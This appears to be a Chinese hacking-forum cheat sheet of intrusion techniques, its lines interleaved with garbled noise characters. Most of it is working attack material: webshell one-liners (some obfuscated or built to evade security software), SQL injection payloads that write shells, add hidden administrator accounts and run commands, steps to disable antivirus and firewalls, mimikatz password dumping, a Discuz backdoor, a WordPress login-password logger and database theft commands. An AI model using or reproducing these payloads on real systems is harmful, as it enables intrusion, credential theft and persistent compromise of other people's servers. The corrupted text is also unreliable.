SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
, z7 X Y. S, _; e6 F$ K6 Uaccess中导出shell0 X) O% a8 S5 x( Z9 K- m9 }- P" f
* Z' ^7 s* w8 x! w中文版本操作系统中针对mysql添加用户完整代码:0 {% p) K7 F& F3 D0 c/ o) y" b! @
# L- r7 A1 E+ K% y D2 V0 s9 N9 s: Quse test;
, h W3 i6 [, y. Z2 Zcreate table a (cmd text);
N3 F& ^% }9 m7 ~, F: s( s4 dinsert into a values ("set wshshell=createobject (""wscript.shell"") " );4 \. i) Y" z4 X( w/ u- a
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
- a( G- }2 x: S* Oinsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );& s$ x" o1 Y8 `6 e' K' \
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";; f" `3 }: T- K9 [9 P/ j0 g
drop table a;/ R" K) q, p# o2 X7 _2 A6 m
9 V8 h, `! \% x5 F9 _
英文版本:, I# F$ }, B; d3 s- Z1 U2 W( Z
" n4 [2 F9 W( ~# ^
use test;/ L/ _% p9 v$ o& Z1 x
create table a (cmd text);
# D* |8 b) \; d: m* `! p8 D4 Uinsert into a values ("set wshshell=createobject (""wscript.shell"") " );# `. V! W3 n t" {9 d0 ]" d
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
1 D# H% o) Q; U# g# d" Pinsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );. `- d' o, l1 s, a: F5 y+ E
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
* J5 A' H; w* Cdrop table a;
9 M4 J1 Y2 p9 w g" m" r
* D/ C( U& c0 N. a! ]create table a (cmd BLOB);
3 o; M' L' r4 g5 o% Cinsert into a values (CONVERT(木马的16进制代码,CHAR));$ L f0 D7 \& [$ X
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'1 t y( b( q. D8 ?0 O
drop table a;( ]4 u( U9 F& ^% f1 f. X; J
3 ?- k9 V& H+ u8 G4 b/ j3 D9 T记录一下怎么处理变态诺顿8 ?/ ~. t" f( j3 Y6 N( W
查看诺顿服务的路径& E1 d8 ]4 B3 E4 x# ]' H0 G
sc qc ccSetMgr% e2 v0 s/ a" V' \
然后设置权限拒绝访问。做绝一点。。
( ^2 w( h; ~. ecacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
x6 f1 c2 H1 ]* ~cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER") z2 W z1 p+ `8 |) n
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
3 W& z7 [, U: @3 ~5 i. x: [cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone
; d4 s8 c. W1 B- b3 ^+ p9 t2 c+ [/ |& t9 A' _
然后再重启服务器0 k# z- Q) `# c
iisreset /reboot- `* w# Y: c+ P; k
这样就搞定了。。不过完事后。记得恢复权限。。。。
- L$ f( S! v$ {& ccacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F- c( A' H0 ^, w- l' k
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F# y! j4 a2 I$ n- n9 N7 S2 e
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F4 C& M# t5 _) ]
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F) j( {1 C( z5 Z' L' d% H; d' {
SELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin: U4 d/ ?& c4 |1 E% F7 y
; n$ L' B' a% ^, m; M% D5 WEXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')
b4 J7 ]( j# S$ V( b. d2 z
% N- O8 s5 o1 |4 X4 _6 Hpostgresql注射的一些东西1 S2 K, g' q7 @& w
如何获得webshell
; o6 B( T8 }- \http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
7 g x8 l! r% Q% Fhttp://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$); + L/ y9 L4 z; h+ o6 X
http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
, Y4 S# r& H N6 b! l如何读文件8 w9 j0 e* F( C
http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
! E: D( d; I' j! ^6 Phttp://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;/ J8 c; Y' ^# z3 y
http://127.0.0.1/postgresql.php?id=1;select * from myfile;
( F8 v: k' \; V& r- }7 U% J0 t* I
) u9 c. h6 x E# g+ g3 ^5 A1 lz执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。* ^) [4 J; {8 [- v' n' _6 x1 q
当然,这些的postgresql的数据库版本必须大于8.X) I; T( S- v/ h# _9 ^% f* E( w
创建一个system的函数:
- n! w$ Y1 t3 n' w- i: MCREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT0 |: l; r+ H6 @& o9 U+ i
( u/ A0 ?8 |& m! Q创建一个输出表:
( a# ^( A9 W6 ]/ cCREATE TABLE stdout(id serial, system_out text)! D- w% B g3 b7 ~
! K$ K1 E% X3 N* {/ i+ @
执行shell,输出到输出表内:
4 J' e9 U+ \0 t5 E) m* v- aSELECT system('uname -a > /tmp/test'); T1 Y: w6 b5 B1 A8 t4 ~
& s2 h- u5 g" y. [copy 输出的内容到表里面;
7 L* Q$ h5 \# L' }9 K! e o% q5 C/ uCOPY stdout(system_out) FROM '/tmp/test'
( D: P. o$ \; t% Z0 L6 @! O
% `" G# `0 O a, L- |0 m! g& P从输出表内读取执行后的回显,判断是否执行成功
$ C/ x6 b: J$ n/ k7 x
7 l+ A* [2 L! f$ v, cSELECT system_out FROM stdout9 S; q, Y8 D* [5 o1 u+ y8 e/ \/ n
下面是测试例子
2 M' L, j: N% u# Q% I0 x. U' A( }
/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) -- ! H$ p! I4 m9 @7 r
' i b; N3 V# o' b7 \/ }
/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'0 \/ g, T- u( z; Q T2 r
STRICT --0 c# n9 w$ s" q3 \$ J
+ H" g5 S: \9 Y2 V; \/store.php?id=1; SELECT system('uname -a > /tmp/test') --- {; d& S" I( S' p. x$ C, \
6 A0 x h4 |/ j2 _6 x! L/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --6 s H; K r9 G/ q+ y
8 W/ J9 y# @: Q+ U- n' _1 K# F/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
% b; _7 B- h, h( U- T) [1 @' z/ gnet stop sharedaccess stop the default firewall
0 c# R5 Y( ?1 l7 ^netsh firewall show show/config default firewall
+ D! ^9 q$ X1 Mnetsh firewall set notifications disable disable the notify when the program is disabled by the default firewall+ J8 z1 I4 s5 p+ e
netsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall
; N2 y3 `9 I; a/ g& v) g修改3389端口方法(修改后不易被扫出)
8 B, ^- S% K( `6 I修改服务器端的端口设置,注册表有2个地方需要修改5 D. N0 {! H* f
5 W/ b& D8 \7 w% C5 s+ s
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]
) m. f% `8 k( ]) ^$ S; D3 [; e0 KPortNumber值,默认是3389,修改成所希望的端口,比如6000; h' Z; C/ q* H P2 v
* V/ ~* u8 I( ?5 N第二个地方:
. b) w# W; k" h1 L( L; S2 N[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp]
$ `8 C2 j. i2 B9 A0 N) RPortNumber值,默认是3389,修改成所希望的端口,比如6000
, O4 o6 i m6 }, h0 v# v) [. T' G6 T2 B% J+ o* R6 m
现在这样就可以了。重启系统就可以了
3 Z! ] g6 t1 ]: H9 W5 I$ j @0 ^+ ]) N# J. P6 C( o% C" Y+ _) {
查看3389远程登录的脚本2 b# U& a& S7 G' I1 {2 ^$ ~
保存为一个bat文件4 x# A" L( c& x4 u8 h
date /t >>D:\sec\TSlog\ts.log
& K: v1 `& W: s. z6 o8 p9 ^time /t >>D:\sec\TSlog\ts.log- k7 ?3 q' P7 o
netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log
( G2 ?) H0 w1 j8 sstart Explorer1 c3 {' S, L: ?1 H' q9 B( t
5 a8 ?/ i" l9 i4 a- |8 d* a5 E/ C! ^+ m
mstsc的参数:
4 u" n- j+ X$ C- o0 v
" r, o/ @8 Y5 w5 X' @远程桌面连接
$ D) w/ s" R6 l4 x& T) x, E
" f* f# P; C! l# ]: K& RMSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]
+ {$ _. q) K2 x# p* } [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?& U; l' A. [9 H8 y, t# ?. \
: k8 C9 E3 {7 Y6 ^1 J1 v% m2 s. a<Connection File> -- 指定连接的 .rdp 文件的名称。
9 _( ~% s% @' E" Y# H
" S+ w" e6 q* m1 Y9 W; \8 c/v:<server[:port]> -- 指定要连接到的终端服务器。
# G% C* V& j5 \! n$ M$ ]. }* e9 n6 {
- a5 C) X* j% E. y! O/console -- 连接到服务器的控制台会话。) l1 F! @% f1 y, \1 b+ G7 ]: x. o6 D) b4 U
# Z7 c0 E6 A. h, x8 q, c$ Z" Q/f -- 以全屏模式启动客户端。2 c& q% j- _4 ?3 y2 j8 _5 k/ ?
, H2 m6 a5 q$ X) Y" E
/w:<width> -- 指定远程桌面屏幕的宽度。
* z) @, O) Z3 R& N$ M! ^/ \) T8 U l7 e- i- O) x; `+ z
/h:<height> -- 指定远程桌面屏幕的高度。1 B9 M0 F9 r' |# ^0 e, |
! ~( [8 h- O& S+ t w5 t) q+ R: X/edit -- 打开指定的 .rdp 文件来编辑。& k1 F, `0 V- `# q( ?" p
# p7 S2 `% i9 E9 @* O5 r( n0 k/migrate -- 将客户端连接管理器创建的旧版2 V1 {8 Q( i5 T* a1 G) r
连接文件迁移到新的 .rdp 连接文件。
0 c( r& `8 c1 |$ }0 O. |8 B% i* i2 q. Y% T6 |& `
- t C# X- K/ Q; w- m; n, v7 {! t其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就. l+ j; y! e& x- A
mstsc /console /v:124.42.126.xxx 突破终端访问限制数量
. ]4 b/ q9 \9 i# o4 q i9 t8 ]' U( m: K+ l. N/ u: P5 L
命令行下开启3389
8 H0 ?# ^4 w/ rnet user asp.net aspnet /add5 O. b( y& ?& Y: r
net localgroup Administrators asp.net /add# V5 I4 N* v' ^. I4 J/ I* q- d
net localgroup "Remote Desktop Users" asp.net /add
; J& K+ k7 n$ |/ ^( O O$ C% Mattrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
! n6 _% `$ j/ `: Q+ oecho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0: b6 }- t! ]2 P5 I/ N1 i8 L
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 18 U- ^, l4 M- w8 ~ z- x1 r
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f
4 l" I3 u$ V I- g+ {sc config rasman start= auto- D0 O- ]! ^# j! l& K
sc config remoteaccess start= auto
0 i2 Z7 N$ L! ~/ S- O! \net start rasman7 N: m. @+ i4 y5 G8 B% F
net start remoteaccess) N0 N u3 s' U/ }. B9 @* z
Media$ I+ `- ?! F; a7 m8 z- f' u- \
<form id="frmUpload" enctype="multipart/form-data"
4 E! x& |) _0 P7 ?& F( saction="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
( O, E& N# e1 f/ C. K8 @' G<input type="file" name="NewFile" size="50"><br>+ a2 X4 a [; ~+ A7 O$ m( i
<input id="btnUpload" type="submit" value="Upload">
% c* S9 \( z' e* C</form>: P, H7 I+ Y6 N- s, C9 O3 o: R" o
- h" N, o/ y5 I. s# @& s: h
control userpasswords2 查看用户的密码; O9 e! D( c) K& |4 O7 t
access数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径
- U3 I; I* i# `4 nSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a6 w+ I1 }) }) K+ K
- Z9 P3 m. L/ T6 i7 E0 w2 @141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:
6 Q: H( \7 `0 c) R- c: J测试1:
0 j0 [6 h& l8 `0 KSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t10 m! b6 k: i* O: i7 l
& F. Q$ v7 ]' S! i* I
测试2:+ _; C* b/ S5 N+ X S
! A+ R. ]6 A2 M
create table dirs(paths varchar(100),paths1 varchar(100), id int)
9 p! G8 b( _1 C: H* A8 b- r+ H( }2 P" |( ?% w" h3 S. t1 e# p' O
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--1 i7 |$ n+ d! ?" v5 i
1 f! O" R7 n; j% U N, W) KSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
* C% Z' \3 ]8 R3 t% w! i2 G关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令
. W1 N4 @8 o" C4 \# K4 K3 f/ E4 f& }可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;
, j+ U4 e/ f; G) i. n$ l2 Vnet stop mcafeeframework
; m; L3 K; S* xnet stop mcshield
) u) ~. Y/ R- h- W5 Gnet stop mcafeeengineservice7 p7 q5 ?3 }. |9 `
net stop mctaskmanager* d/ I! G4 L) D/ |1 n
http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D
7 u5 p" @8 ]& n6 w- l
s# K2 h. _$ w VNCDump.zip (4.76 KB, 下载次数: 1)
! E4 a+ l# b Y6 ^密码在线破解http://tools88.com/safe/vnc.php! X. H* W! G5 l) k
VNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取6 v' `! [- h7 ~. l# Z# }, e
3 y- I6 `6 s' ^& M+ O4 [* `exec master..xp_cmdshell 'net user'* T/ g# g$ r0 Y6 N3 Q3 M% [# d
mssql执行命令。5 d) [/ B* q( U! \, r) S7 y- U
获取mssql的密码hash查询) W X; G7 ^; G o3 J
select name,password from master.dbo.sysxlogins
8 a( M# F+ y9 ?
7 M1 T: C: l9 v' i; w8 ~backup log dbName with NO_LOG;5 U* M6 G x9 S$ a! M
backup log dbName with TRUNCATE_ONLY;
( U5 |) H8 x( E; ADBCC SHRINKDATABASE(dbName);
d" N- J h9 Y: cmssql数据库压缩' \& m8 S2 e) H, O( A: o
3 K0 b8 l+ k$ o) wRar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
1 N0 W" y7 k5 g' h$ O将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。
& Q6 U$ }0 @1 P# h! u
* F# G0 S" G: K2 |4 }" ibackup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
9 K5 G$ A, ]- ?7 j/ ]备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak
0 R# ^) ?9 b6 H3 c8 l: ~
1 p; O" _ U; w* [$ U: qDiscuz!nt35渗透要点:
5 K C0 Q/ K4 Q(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default4 ~1 ?1 F- ^) Y+ G# }
(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
( \$ n( U+ n$ h. h/ ](3)保存。 R6 s, O7 o7 K* T. ]$ Y: }" K
(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass
H' o. s8 ?# Od:\rar.exe a -r d:\1.rar d:\website\: G' i, y) W% @2 c2 C
递归压缩website: w9 |: r/ F$ s5 q2 o1 X
注意rar.exe的路径
, U0 C3 G% |( d4 _/ B" l2 V: s: O& y
<?php
: l8 P' k' ?' K% [. }. U5 P" ~0 V( {( L, }
$telok = "0${@eval($_POST[xxoo])}";
! C9 } M" X0 A; t; w f
4 J0 s8 w* d$ B$username = "123456"; ]( t/ D3 V8 p( X0 m7 L0 o$ U
8 j2 l7 j5 M+ l. u8 i- E. T4 c$userpwd = "123456";9 g1 ?' f# Q) W3 a; t
" B# x* _" Q# f4 q$ z$ ]' {$telhao = "123456";% W0 S2 _7 i6 Y, [% R$ F
8 v: W; g4 _2 e- }
$telinfo = "123456";; R$ X# T# A1 a4 }+ j: S
( v) O9 E2 i$ Q7 X* O* V( X6 L?>
/ u6 ]9 _7 f7 d" S/ c8 ophp一句话未过滤插入一句话木马* C' s2 X. H: k% c; t
/ g+ T3 u" ?* Z! ` C6 @4 j站库分离脱裤技巧" s% @1 W0 y/ V4 h# P- ?
exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'8 m9 }( {( h/ {& t& e$ y7 U2 m
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'. b+ i8 H5 U" d/ P
条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。/ f6 q* x6 b/ n, k- l
这儿利用的是马儿的专家模式(自己写代码)。3 Z' d# p R, \5 P5 T! {
ini_set('display_errors', 1);
8 S) x: ?- J# oset_time_limit(0);" s) r" w4 ~' S5 q, K1 \6 c
error_reporting(E_ALL);" t# A6 q# k, p6 ^- U
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
/ p: R! e) v$ T/ Emysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());/ Y4 }' D1 n3 t: }4 ?( Z% I
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());
- k y8 b1 ?- W: k$i = 0;
! s+ F. z0 D- c( U6 H' O& ~8 M6 q. C$tmp = '';
; C+ {& v, i; t6 P/ ]* F: n) hwhile ($row = mysql_fetch_array($result, MYSQL_NUM)) {6 v: Q% p0 A! ]# c0 Z+ y8 W+ z
$i = $i+1;
L& i- b+ G7 ?2 a $tmp .= implode("::", $row)."\n";
' q+ I9 m8 ~" e2 Q, s4 r if(!($i%500)){//500条写入一个文件
. `. V; s# b" {0 Z, E1 f2 f $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';9 g- H' }' t$ e# y+ x7 N4 l
file_put_contents($filename,$tmp);% o3 d w4 o" Y8 |# Q
$tmp = '';
( q; M: E: K6 F( Y3 Q' J }
: t! N. _. Q. m* ?3 Y" | Q+ d}/ N2 [% f) i6 L3 ]# ~$ a! T) Q
mysql_free_result($result);' o+ I9 b7 `" z9 D9 h0 p- n1 B4 Y3 {
! P& J( \2 |5 Z
( w5 ]( [* k3 s4 V
+ e7 ]1 M( D& {" ~! S//down完后delete
8 s* f! d% T! C, e
. Z" G) w0 N2 N
% f2 q3 O, V; pini_set('display_errors', 1);
% K B' M& D: @error_reporting(E_ALL);
* Z* p7 z: S) H/ K5 W, n9 S) [! O1 h$i = 0;
- s- I9 _ ~9 s1 p$ Y5 L) Cwhile($i<32) {2 Z# {9 u, |9 T/ W9 Y( t
$i = $i+1;
9 _3 [2 u8 |( L3 ?) _1 G: ?. s $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';1 @+ g' p1 o' L' J2 p
unlink($filename);/ i- E- y- l: R8 ~ J; Z# [, @4 m
}
1 H0 u: F3 R. x7 \* J! Phttprint 收集操作系统指纹8 {( B) R; A* j$ T% s$ W" @, Q1 T
扫描192.168.1.100的所有端口
8 j& i% z6 C5 N1 bnmap –PN –sT –sV –p0-65535 192.168.1.1009 L9 x! j6 x c) M$ E! H
host -t ns www.owasp.org 识别的名称服务器,获取dns信息
( m, r6 B/ N4 e0 l9 V1 Nhost -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输
5 f3 p4 E5 o6 h' h( {4 P, C NNetcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host; k4 B7 s% z+ u4 \/ D6 U
/ x; k3 O! h* ~& H0 @6 Z+ v0 `- F1 `Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)
, f1 z( N8 e3 ]
4 X9 J. `8 l: S' k* | MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)
6 @ R6 u' o% x. f7 l
2 f/ k, U/ C& C Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x
9 A1 n* y3 }3 K% \& F
! {9 E5 p: ~: W1 u' T DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)! o; t- U8 o: E5 @6 b; _; B6 A
: `: N, c0 c) l# m; z5 n* t( S4 }4 S http://net-square.com/msnpawn/index.shtml (要求安装)
- M6 x" [- |/ ~, M" k" N; M" A! B0 u
tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)
A8 ]3 e3 `% G8 h" y, m6 X3 P1 g9 G7 D1 q$ M" T: r
SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)
& P' G# K4 E- K2 S& fset names gb2312! z# T2 ~+ R5 X; v! l9 w
导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。+ M y3 t" ^9 i+ d j |* b
# ~# W$ P, N0 M4 q) c, C7 T/ O; Dmysql 密码修改7 t5 B Y) R) N" {( j @
UPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ” * h) K7 _2 F& i* s: r- H
update user set password=PASSWORD('antian365.com') where user='root';0 {6 ?6 q/ g& T4 [0 ^1 m
flush privileges;
/ u- A/ B" F9 K/ Q' }) p4 q高级的PHP一句话木马后门
9 G3 R# q" a% c3 ?: N' s5 X! L; p4 ?/ Y& X5 C, Z
入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀
& b) K/ H5 q8 }* t2 e8 H0 z: w# D8 L* C, y/ j5 P
1、
' p, u' t6 O( k x8 o4 ]
/ e8 d" N3 k; M3 g. r$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";% G5 i- D+ Q7 w. J" q
4 e8 J9 n, {4 v$ W! F
$hh("/[discuz]/e",$_POST['h'],"Access");
1 {& h+ E; h1 l/ _2 e0 Y r0 x6 u' V; X7 j: c6 {9 N
//菜刀一句话
; ?. r0 h8 f2 q+ Q) A3 } S* V9 D" }/ u/ u& \
2、$ C$ G* a! H& P) F* L
3 d$ O: {7 i+ f) X+ [) [$filename=$_GET['xbid'];8 V/ o2 ^, j* C9 C
$ b# P2 Y/ X' W
include ($filename);
* ?9 O$ @8 T4 f8 i) \2 V' _
' F$ F$ ~8 k/ M/ ?, v" P0 O//危险的include函数,直接编译任何文件为php格式运行
1 ~# `& s( _9 K8 S3 X6 c
$ t1 z0 W8 n( z0 u3、
2 {* |5 d- j$ P( r( G
) W* g2 \ J3 S$reg="c"."o"."p"."y";
$ ^6 j1 g9 [8 y: u, v
+ S7 G- s/ O' h2 ^" d& L e$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
' H0 N4 [% [* g) z/ n& y; Q2 N' A- t8 J
//重命名任何文件
& m$ a) }+ S8 G& ?$ Z+ @) z) p- a; L/ [5 A" [
4、
" Y4 |9 P: X8 V, ~0 E1 l3 f
( r/ p2 X* ? x$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
3 J4 v Z8 [- P' v* n7 c$ L
: {# _* B: B+ ]0 Z! Y$gzid("/[discuz]/e",$_POST['h'],"Access");
3 c6 ]( \ D1 D1 i! m ^& \) t9 o( I1 C0 r# q: X
//菜刀一句话
" b' ~" v `, @9 ]" R \2 b, F! A+ {) [
5、include ($uid);
. M. O2 o! g! i# [1 M4 o9 U S/ [9 h% Z, `* \# ]8 D
//危险的include函数,直接编译任何文件为php格式运行,POST
. J' S2 Y( o- s( R
& B }: B. M5 O2 T4 t8 ~
/ J. c" _$ g- ]( x; V* Y//gif插一句话
) y4 d; P9 P( p+ X+ P1 w1 U& d! r1 f) {7 X7 L- G( n* D
6、典型一句话% @% j! v) y) x5 C8 {( x! L
# S3 h. l$ f; I- S& m程序后门代码" ^ m5 F& e# V+ r V M* m K
<?php eval_r($_POST[sb])?>& j: f8 a1 k5 b3 R' r8 U( k
程序代码
1 j5 z8 _1 \; ]/ @9 W9 } ?<?php @eval_r($_POST[sb])?>
7 l0 z: @" C: ]; x5 J8 G//容错代码/ r3 z; ^! m; Y" R$ i- q! _
程序代码
6 j# F6 {( k+ l5 P* N# M<?php assert($_POST[sb]);?>6 D8 G- @. I- I m: B5 R
//使用lanker一句话客户端的专家模式执行相关的php语句) }: z* l0 o0 g1 ]- }) S1 [4 P+ O
程序代码1 G( w9 w% p R z) [
<?$_POST['sa']($_POST['sb']);?>
( R# r$ e$ s9 ~$ {! _程序代码" n, q- k% x! O0 Z0 g
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>5 B/ |! L) B$ w8 N& w
程序代码" c4 B" b* c$ T
<?php
& H; z3 H3 I; y' ?- }, f; {6 u@preg_replace("/[email]/e",$_POST['h'],"error");# t# Y- r5 W) z( b- D+ `3 k, I
?>
/ v- t: p4 i6 M0 V* {2 }$ ^5 Y# \+ w//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
. ^6 N0 c( z; r' C' k程序代码- x5 z* G+ d+ P, W; X0 A
<O>h=@eval_r($_POST[c]);</O>: Y& u! j9 k! c7 o# B
程序代码2 N" y m, U$ C6 D. E$ f
<script language="php">@eval_r($_POST[sb])</script>2 ^ f) f; R* J% P
//绕过<?限制的一句话
, n' \ Y+ o2 x: M3 p! G; u2 }$ O5 e% [# {6 j2 j7 X. G
http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
r% O# n' N9 }- l详细用法:# X" t7 f" w" h
1、到tools目录。psexec \\127.0.0.1 cmd3 x6 i0 O6 J, x7 p9 ~: V! H
2、执行mimikatz L7 D& B% }) `0 g
3、执行 privilege::debug
! n9 J: f; L8 J8 F* a/ \4、执行 inject::process lsass.exe sekurlsa.dll1 T3 l- w( `1 x0 Y4 k. W
5、执行@getLogonPasswords
0 q# z. J$ R% n D( N5 ?1 r6、widget就是密码
8 u4 }4 z! c/ B: Q2 ]7、exit退出,不要直接关闭否则系统会崩溃。
, o" ?- f7 C4 S6 Z; e4 N C" N+ W! m
http://www.monyer.com/demo/monyerjs/ js解码网站比较全面3 d/ b! q K/ m" s2 N* }! Y
% l4 @! u# |8 |( W% L* c/ @. S
自动查找系统高危补丁
% ^4 E) i: L( h) b& w" xsysteminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt8 J8 @. \! e. V& ?" c6 N: ^! M! I, _" G
7 g; \7 n8 h' e
突破安全狗的一句话aspx后门, Z, a6 n2 F2 k: B1 T
<%@ Page Language="C#" ValidateRequest="false" %>
0 P: N' \; X1 K& g1 N7 x* S M% u6 N<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>: v, U" y% V1 V' e' ^' u" i& R; Q$ P
webshell下记录WordPress登陆密码
7 G) d" n9 D$ }( ?8 xwebshell下记录Wordpress登陆密码方便进一步社工
3 W$ _" i; M, V" Z7 W在文件wp-login.php中539行处添加:
! T" L, k4 W, ]9 b% \4 w// log password. W5 _- o, |5 x) F
$log_user=$_POST['log'];
7 X4 t) o0 i2 r& e! Q I$log_pwd=$_POST['pwd'];
/ n4 |! M4 a+ t5 P8 m/ D$log_ip=$_SERVER["REMOTE_ADDR"];
1 J# j: h( V7 B5 G+ m$ d$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;0 C" Z. Z S) y/ t; X
$txt=$txt.”\r\n”; x0 C% i6 v# r, m
if($log_user&&$log_pwd&&$log_ip){4 _2 M9 p5 _' I# z, D, ]
@fwrite(fopen(‘pwd.txt’,”a+”),$txt);
5 N. @, L" C' i( t}
